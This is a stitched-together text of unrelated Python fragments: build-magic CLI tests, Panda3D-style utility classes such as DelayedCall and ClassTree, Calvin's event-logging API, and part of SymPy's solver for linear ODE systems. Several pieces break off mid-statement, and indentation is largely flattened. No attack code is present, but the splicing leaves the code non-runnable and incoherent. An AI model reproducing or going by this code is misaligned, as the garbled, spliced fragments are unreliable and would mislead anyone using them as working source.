"""Verify the --parameter option works correctly."""
res = cli.invoke(build_magic, ['-p', 'keytype', 'rsa', '--parameter', 'keypass', '1234', 'echo hello'])
assert res.exit_code == ExitCode.PASSED
assert '( 1/1 ) EXECUTE : echo hello ........................................ RUNNING' in res.output
assert 'Stage 1 finished with result DONE' in res.output
def test_cli_parameters_invalid_parameter(cli):
"""Test the case where an invalid parameter is provided."""
res = cli.invoke(build_magic, ['-p', 'dummy', '1234', 'echo hello'])
assert res.exit_code == ExitCode.INPUT_ERROR
assert res.output == 'Parameter dummy is not a valid parameter.\n'
def test_cli_parameters_invalid_parameter_value(cli):
"""Test the case where an invalid parameter value is provided."""
res = cli.invoke(build_magic, ['-p', 'keytype', 'dummy', 'echo hello'])
assert res.exit_code == ExitCode.INPUT_ERROR
assert "Validation failed: Value dummy is not one of " in res.output
def test_cli_config_template(cli):
"""Verify the --template option works correctly."""
filename = 'build-magic_template.yaml'
current = Path().cwd().resolve()
res = cli.invoke(build_magic, ['--template'])
assert current.joinpath(filename).exists()
os.remove(filename)
assert res.exit_code == ExitCode.PASSED
def test_cli_template_exists(cli):
"""Test the case where a template config file cannot be generated because one already exists."""
filename = 'build-magic_template.yaml'
current = Path.cwd().resolve()
Path.touch(current.joinpath(filename))
res = cli.invoke(build_magic, ['--template'])
os.remove(filename)
assert res.exit_code == ExitCode.INPUT_ERROR
assert res.output == 'Cannot generate the config template because it already exists!\n'
def test_cli_template_permission_error(cli, mocker):
"""Test the case where a template config file cannot be generated because the user does not have permission."""
mocker.patch('build_magic.core.generate_config_template', side_effect=PermissionError)
res = cli.invoke(build_magic, ['--template'])
assert res.exit_code == ExitCode.INPUT_ERROR
assert res.output == "Cannot generate the config template because build-magic doesn't have permission.\n"
def test_cli_config(cli, config_file, ls):
"""Verify the --config option works correctly."""
res = cli.invoke(build_magic, ['--config', str(config_file)])
assert res.exit_code == ExitCode.PASSED
assert 'Starting Stage 1: Test stage' in res.output
assert '( 1/2 ) EXECUTE : echo hello' in res.output
assert f'( 2/2 ) EXECUTE : {ls}' in res.output
assert 'Stage 1: Test stage - finished with result DONE' in res.output
assert 'build-magic finished in' in res.output
def test_cli_config_multi(cli, config_file, multi_config):
"""Verify assigning multiple config files works correctly."""
file1 = config_file
file2 = multi_config
res = cli.invoke(build_magic, ['--config', str(file1), '--config', str(file2)])
assert res.exit_code == ExitCode.PASSED
assert 'Starting Stage 1: Test stage' in res.output
assert 'Starting Stage 2: Stage A' in res.output
assert 'Starting Stage 3: Stage B' in res.output
assert 'Stage 1: Test stage - finished with result DONE' in res.output
assert 'Stage 2: Stage A - finished with result DONE' in res.output
assert 'Stage 3: Stage B - finished with result DONE' in res.output
def test_cli_config_parameters(cli, mocker, parameters_config):
"""Verify assigning parameters from a config file works correctly."""
mocker.patch('paramiko.ECDSAKey.from_private_key_file')
mocker.patch('build_magic.runner.Remote.connect', return_value=paramiko.SSHClient)
mocker.patch(
'paramiko.SSHClient.exec_command',
return_value=(
None,
MagicMock(readlines=lambda: 'hello', channel=MagicMock(recv_exit_status=lambda: 0)),
MagicMock(readlines=lambda: '')
)
)
mocker.patch('paramiko.SSHClient.close')
res = cli.invoke(build_magic, ['--config', str(parameters_config)])
assert res.exit_code == ExitCode.PASSED
assert "Starting Stage 1" in res.output
assert "( 1/1 ) EXECUTE : echo hello ........................................ RUNNING" in res.output
assert "Stage 1 finished with result DONE" in res.output
def test_cli_target(cli, targets_config):
"""Verify the --target option works correctly."""
# file = Path(resource_filename('tests', 'test_cli.py')).parent / 'files' / 'targets.yaml'
res = cli.invoke(build_magic, ['-C', str(targets_config), '--target', 'Stage D', '-t', 'Stage B'])
assert res.exit_code == ExitCode.PASSED
out = res.output
assert 'Stage D' in out
out = out.split('\n', maxsplit=8)[-1]
assert 'Stage B' in out
assert '( 1/1 ) EXECUTE : echo "B" .......................................... RUNNING' in res.output
assert "Stage 2: Stage B - finished with result DONE" in res.output
def test_cli_invalid_target(cli, targets_config):
"""Test the case where an invalid target name is provided."""
res = cli.invoke(build_magic, ['-C', str(targets_config), '-t', 'blarg'])
out = res.output
assert res.exit_code == ExitCode.INPUT_ERROR
assert out == "Target blarg not found among ['Stage A', 'Stage B', 'Stage C', 'Stage D'].\n"
def test_cli_yaml_parsing_error(cli, config_file, mocker):
"""Test the case where there's an error when parsing a config file."""
yaml_load = mocker.patch('yaml.safe_load', side_effect=ComposerError('YAML error'))
res = cli.invoke(build_magic, ['-C', str(config_file)])
out = res.output
assert res.exit_code == ExitCode.INPUT_ERROR
assert out == 'YAML error\n'
assert yaml_load.call_count == 1
def test_cli_default_config_all_stages(cli, default_config):
"""Verify the "all" argument works with a default config file."""
res = cli.invoke(build_magic, ['all'])
out = res.output
assert res.exit_code == ExitCode.PASSED
assert 'Starting Stage 1: build' in out
assert 'Starting Stage 2: deploy' in out
assert 'Starting Stage 3: release' in out
def test_cli_default_config_single_stage(cli, default_config):
"""Verify running a | |
+ '%0' + '%s' % digits + 'i:%s \t%s'
first = True
s = ''
snip = '<SNIP>'
for i in xrange(len(items)):
if not first:
s += '\n'
first = False
objStr = fastRepr(items[i])
if len(objStr) > maxLen:
objStr = '%s%s' % (objStr[:(maxLen-len(snip))], snip)
s += format % (i, itype(items[i]), objStr)
return s
def getNumberedTypedSortedString(items, maxLen=5000, numPrefix=''):
"""get a string that has each item of the list on its own line,
the items are stringwise-sorted, and each item is numbered on
the left from zero"""
digits = 0
n = len(items)
while n > 0:
digits += 1
n //= 10
digits = digits
format = numPrefix + '%0' + '%s' % digits + 'i:%s \t%s'
snip = '<SNIP>'
    # keep each item paired with its (possibly truncated) repr so that the type
    # column still matches the repr after sorting
    pairs = []
    for item in items:
        objStr = fastRepr(item)
        if len(objStr) > maxLen:
            objStr = '%s%s' % (objStr[:(maxLen-len(snip))], snip)
        pairs.append((objStr, item))
    pairs.sort(key=lambda pair: pair[0])
    first = True
    s = ''
    for i in xrange(len(pairs)):
        if not first:
            s += '\n'
        first = False
        objStr, item = pairs[i]
        s += format % (i, itype(item), objStr)
    return s
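# Hedged usage sketch (added commentary, not part of the original module): given a small mixed
# list, getNumberedTypedSortedString returns one numbered, type-annotated line per item, sorted
# by each item's repr; itype and fastRepr are assumed to be this module's own helpers defined
# earlier in the file (not shown in this excerpt). Output is approximate:
#
#     print getNumberedTypedSortedString(['pear', 3, 'apple'])
#     # 0:<type 'str'>   'apple'
#     # 1:<type 'str'>   'pear'
#     # 2:<type 'int'>   3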
def getNumberedTypedSortedStringWithReferrersGen(items, maxLen=10000, numPrefix=''):
"""get a string that has each item of the list on its own line,
the items are stringwise-sorted, the object's referrers are shown,
and each item is numbered on the left from zero"""
digits = 0
n = len(items)
while n > 0:
digits += 1
n //= 10
digits = digits
format = numPrefix + '%0' + '%s' % digits + 'i:%s @ %s \t%s'
snip = '<SNIP>'
    # keep each item paired with its repr so the type, id and referrers shown on a
    # line refer to the same object as the sorted repr
    pairs = []
    for item in items:
        pairs.append((fastRepr(item), item))
    pairs.sort(key=lambda pair: pair[0])
    for i in xrange(len(pairs)):
        objStr, item = pairs[i]
        objStr += ', \tREFERRERS=['
        referrers = gc.get_referrers(item)
        for ref in referrers:
            objStr += '%s@%s, ' % (itype(ref), id(ref))
        objStr += ']'
        if len(objStr) > maxLen:
            objStr = '%s%s' % (objStr[:(maxLen-len(snip))], snip)
        yield format % (i, itype(item), id(item), objStr)
def getNumberedTypedSortedStringWithReferrers(items, maxLen=10000, numPrefix=''):
"""get a string that has each item of the list on its own line,
the items are stringwise-sorted, the object's referrers are shown,
and each item is numbered on the left from zero"""
s = ''
for line in getNumberedTypedSortedStringWithReferrersGen(items, maxLen, numPrefix):
s += '%s\n' % line
return s
def printNumberedTyped(items, maxLen=5000):
"""print out each item of the list on its own line,
with each item numbered on the left from zero"""
digits = 0
n = len(items)
while n > 0:
digits += 1
n //= 10
digits = digits
format = '%0' + '%s' % digits + 'i:%s \t%s'
for i in xrange(len(items)):
objStr = fastRepr(items[i])
if len(objStr) > maxLen:
snip = '<SNIP>'
objStr = '%s%s' % (objStr[:(maxLen-len(snip))], snip)
print format % (i, itype(items[i]), objStr)
def printNumberedTypesGen(items, maxLen=5000):
digits = 0
n = len(items)
while n > 0:
digits += 1
n //= 10
digits = digits
format = '%0' + '%s' % digits + 'i:%s'
for i in xrange(len(items)):
print format % (i, itype(items[i]))
yield None
def printNumberedTypes(items, maxLen=5000):
"""print out the type of each item of the list on its own line,
with each item numbered on the left from zero"""
for result in printNumberedTypesGen(items, maxLen):
yield result
class DelayedCall:
""" calls a func after a specified delay """
def __init__(self, func, name=None, delay=None):
if name is None:
name = 'anonymous'
if delay is None:
delay = .01
self._func = func
self._taskName = 'DelayedCallback-%s' % name
self._delay = delay
self._finished = False
self._addDoLater()
def destroy(self):
self._finished = True
self._removeDoLater()
def finish(self):
if not self._finished:
self._doCallback()
self.destroy()
def _addDoLater(self):
taskMgr.doMethodLater(self._delay, self._doCallback, self._taskName)
def _removeDoLater(self):
taskMgr.remove(self._taskName)
    def _doCallback(self, task=None):
self._finished = True
func = self._func
del self._func
func()
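# Hedged usage sketch (added commentary, not part of the original module): DelayedCall schedules
# `func` on the global taskMgr roughly `delay` seconds from now; destroy() cancels it, finish()
# runs it immediately if it has not fired yet.
#
#     def announce():
#         print 'fired'
#     dc = DelayedCall(announce, name='announce', delay=0.5)
#     # dc.destroy()   # cancel before it fires
#     # dc.finish()    # or force it to run right away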
class FrameDelayedCall:
""" calls a func after N frames """
def __init__(self, name, callback, frames=None, cancelFunc=None):
        # cancelFunc is optional; it is called every frame, and if it returns True the
        # FrameDelayedCall is cancelled and the callback is never called
if frames is None:
frames = 1
self._name = name
self._frames = frames
self._callback = callback
self._cancelFunc = cancelFunc
self._taskName = uniqueName('%s-%s' % (self.__class__.__name__, self._name))
self._finished = False
self._startTask()
def destroy(self):
self._finished = True
self._stopTask()
def finish(self):
if not self._finished:
self._finished = True
self._callback()
self.destroy()
def _startTask(self):
taskMgr.add(self._frameTask, self._taskName)
self._counter = 0
def _stopTask(self):
taskMgr.remove(self._taskName)
def _frameTask(self, task):
if self._cancelFunc and self._cancelFunc():
self.destroy()
return task.done
self._counter += 1
if self._counter >= self._frames:
self.finish()
return task.done
return task.cont
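# Hedged usage sketch (added commentary, not part of the original module): run a callback a fixed
# number of frames from now unless a cancel predicate becomes true first. `gameOver` here is a
# hypothetical flag used only for illustration.
#
#     def spawnFx():
#         print 'two frames later'
#     fdc = FrameDelayedCall('spawnFx', spawnFx, frames=2,
#                            cancelFunc=lambda: gameOver)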
class DelayedFunctor:
""" Waits for this object to be called, then calls supplied functor after a delay.
Effectively inserts a time delay between the caller and the functor. """
def __init__(self, functor, name=None, delay=None):
self._functor = functor
self._name = name
# FunctionInterval requires __name__
self.__name__ = self._name
self._delay = delay
def _callFunctor(self):
cb = Functor(self._functor, *self._args, **self._kwArgs)
del self._functor
del self._name
del self._delay
del self._args
del self._kwArgs
del self._delayedCall
del self.__name__
cb()
def __call__(self, *args, **kwArgs):
self._args = args
self._kwArgs = kwArgs
self._delayedCall = DelayedCall(self._callFunctor, self._name, self._delay)
class SubframeCall:
"""Calls a callback at a specific time during the frame using the
task system"""
def __init__(self, functor, taskPriority, name=None):
self._functor = functor
self._name = name
self._taskName = uniqueName('SubframeCall-%s' % self._name)
taskMgr.add(self._doCallback,
self._taskName,
priority=taskPriority)
def _doCallback(self, task):
functor = self._functor
del self._functor
functor()
del self._name
self._taskName = None
return task.done
def cleanup(self):
if (self._taskName):
taskMgr.remove(self._taskName)
self._taskName = None
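# Hedged usage sketch (added commentary, not part of the original module): SubframeCall runs a
# callback once, at a chosen point within the frame, by adding a one-shot task at the given
# priority. `lateUpdate` is a made-up example callback.
#
#     def lateUpdate():
#         print 'after other tasks this frame'
#     sc = SubframeCall(lateUpdate, taskPriority=50, name='lateUpdate')
#     # sc.cleanup()   # cancel it if the callback has not run yet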
class ArgumentEater:
def __init__(self, numToEat, func):
self._numToEat = numToEat
self._func = func
def destroy(self):
del self._func
def __call__(self, *args, **kwArgs):
self._func(*args[self._numToEat:], **kwArgs)
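# Hedged usage sketch (added commentary, not part of the original module): ArgumentEater drops
# the first numToEat positional arguments before forwarding the call, e.g. to adapt a callback
# that receives extra leading parameters it does not care about.
#
#     def onChange(newValue):
#         print 'new value:', newValue
#     handler = ArgumentEater(1, onChange)   # eat the hypothetical 'sender' argument
#     handler('someSender', 42)              # prints: new value: 42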
class ClassTree:
def __init__(self, instanceOrClass):
if type(instanceOrClass) in (types.ClassType, types.TypeType):
cls = instanceOrClass
else:
cls = instanceOrClass.__class__
self._cls = cls
self._bases = []
for base in self._cls.__bases__:
if base not in (types.ObjectType, types.TypeType):
self._bases.append(ClassTree(base))
def getAllClasses(self):
# returns set of this class and all base classes
classes = set()
classes.add(self._cls)
for base in self._bases:
classes.update(base.getAllClasses())
return classes
def _getStr(self, indent=None, clsLeftAtIndent=None):
# indent is how far to the right to indent (i.e. how many levels
# deep in the hierarchy from the most-derived)
#
# clsLeftAtIndent is an array of # of classes left to be
# printed at each level of the hierarchy; most-derived is
# at index 0
if indent is None:
indent = 0
clsLeftAtIndent = [1]
s = ''
if (indent > 1):
for i in xrange(1, indent):
# if we have not printed all base classes at
# this indent level, keep printing the vertical
# column
if clsLeftAtIndent[i] > 0:
s += ' |'
else:
s += ' '
if (indent > 0):
s += ' +'
s += self._cls.__name__
clsLeftAtIndent[indent] -= 1
"""
### show the module to the right of the class name
moduleIndent = 48
if len(s) >= moduleIndent:
moduleIndent = (len(s) % 4) + 4
padding = moduleIndent - len(s)
s += padding * ' '
s += self._cls.__module__
###
"""
if len(self._bases):
newList = list(clsLeftAtIndent)
newList.append(len(self._bases))
bases = self._bases
# print classes with fewer bases first
bases.sort(lambda x,y: len(x._bases)-len(y._bases))
for base in bases:
s += '\n%s' % base._getStr(indent+1, newList)
return s
def __repr__(self):
return self._getStr()
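# Hedged usage sketch (added commentary, not part of the original module): ClassTree renders an
# indented view of a class hierarchy, most-derived class first, with '+' marking each base level.
#
#     class A(object): pass
#     class B(A): pass
#     print ClassTree(B())
#     # B
#     #  +A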
class PStatScope:
collectors = {}
def __init__(self, level = None):
self.levels = []
if level:
self.levels.append(level)
def copy(self, push = None):
c = PStatScope()
c.levels = self.levels[:]
if push:
c.push(push)
return c
def __repr__(self):
return 'PStatScope - \'%s\'' % (self,)
def __str__(self):
return ':'.join(self.levels)
def push(self, level):
self.levels.append(level.replace('_',''))
def pop(self):
return self.levels.pop()
def start(self, push = None):
if push:
self.push(push)
pass
self.getCollector().start()
def stop(self, pop = False):
self.getCollector().stop()
if pop:
self.pop()
def getCollector(self):
label = str(self)
if label not in self.collectors:
from panda3d.core import PStatCollector
self.collectors[label] = PStatCollector(label)
pass
# print ' ',self.collectors[label]
return self.collectors[label]
def pstatcollect(scope, level = None):
def decorator(f):
return f
try:
if not (__dev__ or config.GetBool('force-pstatcollect', 0)) or \
not scope:
return decorator
def decorator(f):
def wrap(*args, **kw):
scope.start(push = (level or f.__name__))
val = f(*args, **kw)
scope.stop(pop = True)
return val
return wrap
pass
except:
pass
return decorator
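# Illustrative usage sketch (not part of the original module; the scope and level
# names are hypothetical). The wrapper is only installed when __dev__ or the
# force-pstatcollect config flag is set; otherwise the function is returned unchanged.
#
#   updateScope = PStatScope('app')
#
#   @pstatcollect(updateScope, level='update')
#   def update(dt):
#       pass  # work is accumulated under the 'app:update' PStat collector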
__report_indent = 0
def report(types = [], prefix = '', xform = None, notifyFunc = None, dConfigParam = []):
"""
This is a decorator generating function. Use is similar to
a
<filename>calvin/runtime/north/control_apis/logging_api.py
# -*- coding: utf-8 -*-
# Copyright (c) 2018 Ericsson AB
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import json
import time
from calvin.requests import calvinresponse
from calvin.utilities import calvinuuid
from routes import register, handler
from authentication import authentication_decorator
LOG_ACTOR_FIRING = 0
LOG_ACTION_RESULT = 1
LOG_ACTOR_NEW = 2
LOG_ACTOR_DESTROY = 3
LOG_ACTOR_MIGRATE = 4
LOG_APPLICATION_NEW = 5
LOG_APPLICATION_DESTROY = 6
LOG_LINK_CONNECTED = 7
LOG_LINK_DISCONNECTED = 8
LOG_ACTOR_REPLICATE = 9
LOG_ACTOR_DEREPLICATE = 10
LOG_LOG_MESSAGE = 11
class Logger(object):
""" Log object
"""
def __init__(self, actors, events):
self.handle = None
self.connection = None
self.actors = actors
self.events = events
def set_connection(self, handle, connection):
self.handle = handle
self.connection = connection
#
# Override a number of stub methods with real implementations
#
@register
def log_actor_firing(self, actor_id, action_method, tokens_produced, tokens_consumed, production):
""" Trace actor firing
"""
disconnected = []
for user_id, logger in self.loggers.iteritems():
if not logger.events or LOG_ACTOR_FIRING in logger.events:
if not logger.actors or actor_id in logger.actors:
data = {}
data['timestamp'] = time.time()
data['node_id'] = self.node.id
data['type'] = 'actor_fire'
data['actor_id'] = actor_id
data['action_method'] = action_method
data['produced'] = tokens_produced
data['consumed'] = tokens_consumed
if LOG_ACTION_RESULT in logger.events:
data['action_result'] = production
if logger.connection is not None:
if not logger.connection.connection_lost:
logger.connection.send("data: %s\n\n" % json.dumps(data))
else:
disconnected.append(user_id)
elif self.tunnel_client is not None and logger.handle is not None:
msg = {"cmd": "logevent", "msgid": logger.handle, "header": None, "data": "data: %s\n\n" % json.dumps(data)}
self.tunnel_client.send(msg)
for user_id in disconnected:
del self.loggers[user_id]
@register
def log_actor_new(self, actor_id, actor_name, actor_type, is_shadow):
""" Trace actor new
"""
disconnected = []
for user_id, logger in self.loggers.iteritems():
if not logger.events or LOG_ACTOR_NEW in logger.events:
if not logger.actors or actor_id in logger.actors:
data = {}
data['timestamp'] = time.time()
data['node_id'] = self.node.id
data['type'] = 'actor_new'
data['actor_id'] = actor_id
data['actor_name'] = actor_name
data['actor_type'] = actor_type
data['is_shadow'] = is_shadow
if logger.connection is not None:
if not logger.connection.connection_lost:
logger.connection.send("data: %s\n\n" % json.dumps(data))
else:
disconnected.append(user_id)
elif self.tunnel_client is not None and logger.handle is not None:
msg = {"cmd": "logevent", "msgid": logger.handle, "header": None, "data": "data: %s\n\n" % json.dumps(data)}
self.tunnel_client.send(msg)
for user_id in disconnected:
del self.loggers[user_id]
@register
def log_actor_destroy(self, actor_id):
""" Trace actor destroy
"""
disconnected = []
for user_id, logger in self.loggers.iteritems():
if not logger.events or LOG_ACTOR_DESTROY in logger.events:
if not logger.actors or actor_id in logger.actors:
data = {}
data['timestamp'] = time.time()
data['node_id'] = self.node.id
data['type'] = 'actor_destroy'
data['actor_id'] = actor_id
if logger.connection is not None:
if not logger.connection.connection_lost:
logger.connection.send("data: %s\n\n" % json.dumps(data))
else:
disconnected.append(user_id)
elif self.tunnel_client is not None and logger.handle is not None:
msg = {"cmd": "logevent", "msgid": logger.handle, "header": None, "data": "data: %s\n\n" % json.dumps(data)}
self.tunnel_client.send(msg)
for user_id in disconnected:
del self.loggers[user_id]
@register
def log_actor_migrate(self, actor_id, dest_node_id):
""" Trace actor migrate
"""
disconnected = []
for user_id, logger in self.loggers.iteritems():
if not logger.events or LOG_ACTOR_MIGRATE in logger.events:
if not logger.actors or actor_id in logger.actors:
data = {}
data['timestamp'] = time.time()
data['node_id'] = self.node.id
data['type'] = 'actor_migrate'
data['actor_id'] = actor_id
data['dest_node_id'] = dest_node_id
if logger.connection is not None:
if not logger.connection.connection_lost:
logger.connection.send("data: %s\n\n" % json.dumps(data))
else:
disconnected.append(user_id)
elif self.tunnel_client is not None and logger.handle is not None:
msg = {"cmd": "logevent", "msgid": logger.handle, "header": None, "data": "data: %s\n\n" % json.dumps(data)}
self.tunnel_client.send(msg)
for user_id in disconnected:
del self.loggers[user_id]
@register
def log_actor_replicate(self, actor_id, replica_actor_id, replication_id, dest_node_id):
""" Trace actor replication
"""
disconnected = []
for user_id, logger in self.loggers.iteritems():
if not logger.events or LOG_ACTOR_REPLICATE in logger.events:
if not logger.actors or actor_id in logger.actors:
data = {}
data['timestamp'] = time.time()
data['node_id'] = self.node.id
data['type'] = 'actor_replicate'
data['actor_id'] = actor_id
data['dest_node_id'] = dest_node_id
data['replication_id'] = replication_id
data['replica_actor_id'] = replica_actor_id
if logger.connection is not None:
if not logger.connection.connection_lost:
logger.connection.send("data: %s\n\n" % json.dumps(data))
else:
disconnected.append(user_id)
elif self.tunnel_client is not None and logger.handle is not None:
msg = {"cmd": "logevent", "msgid": logger.handle, "header": None, "data": "data: %s\n\n" % json.dumps(data)}
self.tunnel_client.send(msg)
for user_id in disconnected:
del self.loggers[user_id]
@register
def log_actor_dereplicate(self, actor_id, replica_actor_id, replication_id):
""" Trace actor dereplication
"""
disconnected = []
for user_id, logger in self.loggers.iteritems():
if not logger.events or LOG_ACTOR_DEREPLICATE in logger.events:
if not logger.actors or actor_id in logger.actors:
data = {}
data['timestamp'] = time.time()
data['node_id'] = self.node.id
data['type'] = 'actor_dereplicate'
data['actor_id'] = actor_id
data['replication_id'] = replication_id
data['replica_actor_id'] = replica_actor_id
if logger.connection is not None:
if not logger.connection.connection_lost:
logger.connection.send("data: %s\n\n" % json.dumps(data))
else:
disconnected.append(user_id)
elif self.tunnel_client is not None and logger.handle is not None:
msg = {"cmd": "logevent", "msgid": logger.handle, "header": None, "data": "data: %s\n\n" % json.dumps(data)}
self.tunnel_client.send(msg)
for user_id in disconnected:
del self.loggers[user_id]
@register
def log_application_new(self, application_id, application_name):
""" Trace application new
"""
disconnected = []
for user_id, logger in self.loggers.iteritems():
if not logger.events or LOG_APPLICATION_NEW in logger.events:
data = {}
data['timestamp'] = time.time()
data['node_id'] = self.node.id
data['type'] = 'application_new'
data['application_id'] = application_id
data['application_name'] = application_name
if logger.connection is not None:
if not logger.connection.connection_lost:
logger.connection.send("data: %s\n\n" % json.dumps(data))
else:
disconnected.append(user_id)
elif self.tunnel_client is not None and logger.handle is not None:
msg = {"cmd": "logevent", "msgid": logger.handle, "header": None, "data": "data: %s\n\n" % json.dumps(data)}
self.tunnel_client.send(msg)
for user_id in disconnected:
del self.loggers[user_id]
@register
def log_application_destroy(self, application_id):
""" Trace application destroy
"""
disconnected = []
for user_id, logger in self.loggers.iteritems():
if not logger.events or LOG_APPLICATION_DESTROY in logger.events:
data = {}
data['timestamp'] = time.time()
data['node_id'] = self.node.id
data['type'] = 'application_destroy'
data['application_id'] = application_id
if logger.connection is not None:
if not logger.connection.connection_lost:
logger.connection.send("data: %s\n\n" % json.dumps(data))
else:
disconnected.append(user_id)
elif self.tunnel_client is not None and logger.handle is not None:
msg = {"cmd": "logevent", "msgid": logger.handle, "header": None, "data": "data: %s\n\n" % json.dumps(data)}
self.tunnel_client.send(msg)
for user_id in disconnected:
del self.loggers[user_id]
@register
def log_link_connected(self, peer_id, uri):
""" Trace node connect
"""
disconnected = []
for user_id, logger in self.loggers.iteritems():
if not logger.events or LOG_LINK_CONNECTED in logger.events:
data = {}
data['timestamp'] = time.time()
data['node_id'] = self.node.id
data['type'] = 'link_connected'
data['peer_id'] = peer_id
data['uri'] = uri
if logger.connection is not None:
if not logger.connection.connection_lost:
logger.connection.send("data: %s\n\n" % json.dumps(data))
else:
disconnected.append(user_id)
elif self.tunnel_client is not None and logger.handle is not None:
msg = {"cmd": "logevent", "msgid": logger.handle, "header": None, "data": "data: %s\n\n" % json.dumps(data)}
self.tunnel_client.send(msg)
for user_id in disconnected:
del self.loggers[user_id]
@register
def log_link_disconnected(self, peer_id):
""" Trace node connect
"""
disconnected = []
for user_id, logger in self.loggers.iteritems():
if not logger.events or LOG_LINK_DISCONNECTED in logger.events:
data = {}
data['timestamp'] = time.time()
data['node_id'] = self.node.id
data['type'] = 'link_disconnected'
data['peer_id'] = peer_id
if logger.connection is not None:
if not logger.connection.connection_lost:
logger.connection.send("data: %s\n\n" % json.dumps(data))
else:
disconnected.append(user_id)
elif self.tunnel_client is not None and logger.handle is not None:
msg = {"cmd": "logevent", "msgid": logger.handle, "header": None, "data": "data: %s\n\n" % json.dumps(data)}
self.tunnel_client.send(msg)
for user_id in disconnected:
del self.loggers[user_id]
@register
def log_log_message(self, message):
""" Log message that is displayed at listener
"""
disconnected = []
for user_id, logger in self.loggers.iteritems():
if not logger.events or LOG_LOG_MESSAGE in logger.events:
data = {}
data['timestamp'] = time.time()
data['node_id'] = self.node.id
data['type'] = 'log_message'
data['msg'] = message
if logger.connection is not None:
if not logger.connection.connection_lost:
logger.connection.send("data: %s\n\n" % json.dumps(data))
else:
disconnected.append(user_id)
elif self.tunnel_client is not None and logger.handle is not None:
msg = {"cmd": "logevent", "msgid": logger.handle, "header": None, "data": "data: %s\n\n" % json.dumps(data)}
self.tunnel_client.send(msg)
for user_id in disconnected:
del self.loggers[user_id]
@handler(method="POST", path="/log")
@authentication_decorator
def handle_post_log(self, handle, connection, match, data, hdr):
"""
POST /log
Register for log events and set actor and event filter.
Body:
{
'user_id': <user_id> # Optional user id
'actors': [<actor-id>], # Actors to log, empty list for all
'events': [<event_type>] # Event types to log: actor_firing, action_result,
actor_new, actor_destroy, actor_migrate,
application_new, application_destroy
}
Response status code: OK or BAD_REQUEST
Response:
{
'user_id': <user_id>,
'epoch_year': <the year the epoch starts at Jan 1 00:00, e.g. 1970>
}
"""
status = calvinresponse.OK
actors = []
events = []
if data and 'user_id' in data:
user_id = data['user_id']
else:
user_id = calvinuuid.uuid("TRACE")
if user_id not in self.loggers:
if 'actors' in data and data['actors']:
actors =
if j >= i
else zeros(2, 2))
expJblock = Matrix(2*n, 2*n, lambda i,j: expJblock2[i//2,j//2][i%2,j%2])
blocks.append(exprt * expJblock)
for i in range(n):
vectors.append(re(chain[i]))
vectors.append(im(chain[i]))
else:
vectors.extend(chain)
fun = lambda i,j: t**(j-i)/factorial(j-i) if j >= i else 0
expJblock = Matrix(n, n, fun)
blocks.append(exp(e * t) * expJblock)
expJ = Matrix.diag(*blocks)
P = Matrix(N, N, lambda i,j: vectors[j][i])
return P, expJ
def _neq_linear_first_order_const_coeff_homogeneous(match_):
r"""
System of n first-order constant-coefficient linear homogeneous differential equations
.. math:: y'_k = a_{k1} y_1 + a_{k2} y_2 +...+ a_{kn} y_n; k = 1,2,...,n
or that can be written as `\vec{y'} = A . \vec{y}`
where `\vec{y}` is matrix of `y_k` for `k = 1,2,...n` and `A` is a `n \times n` matrix.
Since these equations are equivalent to a first-order homogeneous linear
differential equation, the general solution will contain `n` linearly
independent parts and the solution will consist of some type of exponential
functions. Assuming `y = \vec{v} e^{rt}` is a solution of the system, where
`\vec{v}` is a vector of coefficients of `y_1,...,y_n`. Substituting `y` and
`y' = r v e^{r t}` into the equation `\vec{y'} = A . \vec{y}`, we get
.. math:: r \vec{v} e^{rt} = A \vec{v} e^{rt}
.. math:: r \vec{v} = A \vec{v}
where `r` comes out to be eigenvalue of `A` and vector `\vec{v}` is the eigenvector
of `A` corresponding to `r`. There are three possibilities of eigenvalues of `A`
- `n` distinct real eigenvalues
- complex conjugate eigenvalues
- eigenvalues with multiplicity `k`
1. When all eigenvalues `r_1,..,r_n` are distinct with `n` different eigenvectors
`v_1,...v_n` then the solution is given by
.. math:: \vec{y} = C_1 e^{r_1 t} \vec{v_1} + C_2 e^{r_2 t} \vec{v_2} +...+ C_n e^{r_n t} \vec{v_n}
where `C_1,C_2,...,C_n` are arbitrary constants.
2. When some eigenvalues are complex, then in order to make the solution real,
we take a linear combination: if `r = a + bi` has an eigenvector
`\vec{v} = \vec{w_1} + i \vec{w_2}`, then to obtain real-valued solutions to
the system, replace the complex-valued solution `e^{rx} \vec{v}`
with the real-valued solution `e^{ax} (\vec{w_1} \cos(bx) - \vec{w_2} \sin(bx))`,
and for the conjugate eigenvalue `r = a - bi` replace the corresponding solution
`e^{(a - b i) x} \overline{\vec{v}}` with
`e^{ax} (\vec{w_1} \sin(bx) + \vec{w_2} \cos(bx))`
3. If some eigenvalues are repeated, then we get fewer than `n` linearly
independent eigenvectors, so we miss some of the solutions and need to
construct the missing ones. We do this via generalized eigenvectors, vectors
which are not eigenvectors but are close enough that we can use them to write
down the remaining solutions. For an eigenvalue `r` with eigenvector `\vec{w}`
we obtain `\vec{w_2},...,\vec{w_k}` using
.. math:: (A - r I) . \vec{w_2} = \vec{w}
.. math:: (A - r I) . \vec{w_3} = \vec{w_2}
.. math:: \vdots
.. math:: (A - r I) . \vec{w_k} = \vec{w_{k-1}}
Then the solutions to the system for the eigenspace are `e^{rt} [\vec{w}],
e^{rt} [t \vec{w} + \vec{w_2}], e^{rt} [\frac{t^2}{2} \vec{w} + t \vec{w_2} + \vec{w_3}],
...,e^{rt} [\frac{t^{k-1}}{(k-1)!} \vec{w} + \frac{t^{k-2}}{(k-2)!} \vec{w_2} +...+ t \vec{w_{k-1}}
+ \vec{w_k}]`
So, if `\vec{y_1},...,\vec{y_n}` are `n` solutions obtained from the three
categories of `A` above, then the general solution to the system `\vec{y'} = A . \vec{y}` is
.. math:: \vec{y} = C_1 \vec{y_1} + C_2 \vec{y_2} + \cdots + C_n \vec{y_n}
"""
eq = match_['eq']
func = match_['func']
fc = match_['func_coeff']
n = len(eq)
t = list(list(eq[0].atoms(Derivative))[0].atoms(Symbol))[0]
constants = numbered_symbols(prefix='C', cls=Symbol, start=1)
# This needs to be modified in future so that fc is only of type Matrix
M = -fc if type(fc) is Matrix else Matrix(n, n, lambda i,j:-fc[i,func[j],0])
P, J = matrix_exp_jordan_form(M, t)
P = simplify(P)
